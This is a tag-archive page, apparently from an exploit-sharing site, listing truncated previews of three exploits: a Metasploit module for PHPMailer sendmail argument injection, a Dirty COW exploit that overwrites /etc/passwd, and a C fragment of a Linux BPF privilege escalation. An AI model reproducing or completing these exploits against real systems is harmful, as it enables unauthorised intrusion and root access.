Tags archives: vulnerabilities









PHPMailer Sendmail Argument Injection

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require 'msf/core'   class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking   include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient   def initialize(info = {}) super(update_info(info, 'Name' => 'PHPMailer Sendmail Argument Injection', 'Description' => %q{ PHPMailer versions up to and including 5.2.19 are affected by a vulnerability [...]




Linux Kernel Dirty COW PTRACE_POKEDATA Privilege Escalation

// // This exploit uses the pokemon exploit as a base and automatically // generates a new passwd line. The original /etc/passwd is then // backed up to /tmp/passwd.bak and overwritten with the new line. // The user will be prompted for the new password when the binary is run. // After running the exploit [...]



Linux BPF Local Privilege Escalation

/dev/null; mkdir -p fuse_mount && ./hello ./fuse_mount")) errx(1, "system() failed"); int fuse_fd = open("fuse_mount/hello", O_RDWR); if (fuse_fd == -1) err(1, "unable to open FUSE fd"); if (write(fuse_fd, &iov, sizeof(iov)) != sizeof(iov)) errx(1, "unable to write to FUSE fd"); struct iovec *iov_ = mmap(NULL, sizeof(iov), PROT_READ, MAP_SHARED, fuse_fd, 0); if (iov_ == MAP_FAILED) err(1, "unable to [...]